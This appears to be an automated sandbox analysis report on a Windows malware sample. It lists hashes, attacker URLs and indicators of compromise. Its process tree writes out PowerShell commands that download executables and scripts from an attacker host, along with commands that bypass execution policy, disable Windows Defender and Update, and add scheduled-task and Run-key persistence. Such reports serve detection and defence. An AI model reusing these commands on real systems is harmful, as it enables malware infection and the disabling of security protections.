Analysis
- max time kernel: 136s
- max time network: 112s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 29-06-2021 20:14

Static task: static1
Behavioral task: behavioral1
- Sample: 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
- Resource: win10v20210410
General
- Target: 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
- Size: 3.1MB
- MD5: 52bbd67fdb23378f2ad43efb150abdc4
- SHA1: 9d138f1bf129473cb0d74c0d94ec8af2daa311c7
- SHA256: 22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d
- SHA512: 7cf115c532466de78abd369ba202f738a3520f7c2b87c4847a8d8e59dc6e2c0d7cd9da1995d019690edd92b3ed154a9d659b7a6932c091e9c042192a66049755
Malware Config
Extracted URLs:
- http://gamecardsy.com/ahmadtestupl/DefenderControl.exe
- http://gamecardsy.com/ahmadtestupl/DefenderKill.txt
- http://gamecardsy.com/ahmadtestupl/Defender.bat
- http://gamecardsy.com/ahmadtestupl/ff.ps1
- http://gamecardsy.com/ahmadtestupl/DefenderControl.txt
Signatures

Modifies security service (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | Setup.exe

Blocklisted process makes network request (5 IoCs)
Processes:
  flow | pid | process
  12 | 1824 | powershell.exe
  13 | 184 | powershell.exe
  14 | 3168 | powershell.exe
  15 | 2448 | powershell.exe
  16 | 2336 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (6 IoCs)
Processes:
  pid | process
  3996 | Setup.exe
  3228 | DefenderControl.exe
  2008 | DefenderControl.exe
  1932 | conhostHost.exe
  2024 | conhost.exe
  1576 | conhost.exe

Drops startup file (4 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest | conhostHost.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | conhost.exe

Windows security modification
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection | DefenderControl.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run | conhost.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\"" | conhost.exe
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run | conhost.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\"" | conhost.exe

Drops file in System32 directory (2 IoCs)
Processes:
  description | ioc | process
  File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | DefenderControl.exe
  File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | DefenderControl.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  1920 | schtasks.exe
  3616 | schtasks.exe

Modifies system certificate store
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | conhost.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob omitted) | conhost.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob omitted) | conhost.exe

Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes (identical rows collapsed, count in last column):
  pid | process | count
  1824 | powershell.exe | 3
  184 | powershell.exe | 3
  3168 | powershell.exe | 3
  2448 | powershell.exe | 3
  2336 | powershell.exe | 3
  2356 | powershell.exe | 3
  3228 | DefenderControl.exe | 4

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes:
  pid | process
  3996 | Setup.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1824 | powershell.exe
  Token: SeDebugPrivilege | 184 | powershell.exe
  Token: SeDebugPrivilege | 3168 | powershell.exe
  Token: SeDebugPrivilege | 2448 | powershell.exe
  Token: SeDebugPrivilege | 2336 | powershell.exe
  Token: SeDebugPrivilege | 2356 | powershell.exe

Suspicious use of FindShellTrayWindow (7 IoCs)
Processes (identical rows collapsed, count in last column):
  pid | process | count
  3944 | 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe | 2
  3228 | DefenderControl.exe | 3
  1932 | conhostHost.exe | 2

Suspicious use of SendNotifyMessage (4 IoCs)
Processes (identical rows collapsed, count in last column):
  pid | process | count
  3944 | 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe | 2
  1932 | conhostHost.exe | 2

Suspicious use of WriteProcessMemory (42 IoCs)
Processes (each row reads "PID <pid> wrote to memory of <target pid>"; identical rows collapsed, count in last column):
  pid | process | target pid | target process | count
  3944 | 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe | 3996 | Setup.exe | 3
  3944 | 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe | 1348 | cmd.exe | 3
  1348 | cmd.exe | 1824 | powershell.exe | 3
  1348 | cmd.exe | 184 | powershell.exe | 3
  1348 | cmd.exe | 3168 | powershell.exe | 3
  1348 | cmd.exe | 2448 | powershell.exe | 3
  1348 | cmd.exe | 2336 | powershell.exe | 3
  1348 | cmd.exe | 2356 | powershell.exe | 3
  2356 | powershell.exe | 2372 | cmd.exe | 3
  2372 | cmd.exe | 3228 | DefenderControl.exe | 3
  2372 | cmd.exe | 2008 | DefenderControl.exe | 3
  3944 | 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe | 1932 | conhostHost.exe | 2
  1932 | conhostHost.exe | 2024 | conhost.exe | 3
  2024 | conhost.exe | 1920 | schtasks.exe | 2
  1576 | conhost.exe | 3616 | schtasks.exe | 2
Processes (tree; indentation shows the parent/child depth from the report)

C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
command: "C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory

   C:\ProgramData\Setup.exe
   command: C:\ProgramData\Setup.exe
   - Modifies security service
   - Executes dropped EXE
   - Suspicious behavior: GetForegroundWindowSpam

   C:\Windows\SysWOW64\cmd.exe
   command: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
   - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderKill.txt', 'C:\Users\Public\DefenderKill.lnk') }"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/Defender.bat', 'C:\Users\Public\Defender.bat') }"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/ff.ps1', 'C:\Users\Public\ff.ps1') }"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.txt', 'C:\Users\Public\DefenderControl.ini') }"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps1
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

         C:\Windows\SysWOW64\cmd.exe
         command: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
         - Suspicious use of WriteProcessMemory

            C:\Users\Public\DefenderControl.exe
            command: DefenderControl.exe /D
            - Executes dropped EXE
            - Windows security modification
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow

            C:\Users\Public\DefenderControl.exe
            command: DefenderControl.exe /Q
            - Executes dropped EXE

   C:\ProgramData\conhostHost.exe
   command: C:\ProgramData\conhostHost.exe
   - Executes dropped EXE
   - Drops startup file
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SendNotifyMessage
   - Suspicious use of WriteProcessMemory

      C:\ProgramData\conhost.exe
      command: C:\ProgramData/conhost.exe
      - Executes dropped EXE
      - Drops startup file
      - Adds Run key to start application
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory

         C:\Windows\System32\schtasks.exe
         command: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
         - Creates scheduled task(s)

C:\Windows\system32\svchost.exe
command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\svchost.exe
command: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe
command: gpscript.exe /RefreshSystemParam

C:\ProgramData\conhost.exe
command: C:\ProgramData\conhost.exe
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory

   C:\Windows\System32\schtasks.exe
   command: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
   - Creates scheduled task(s)
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads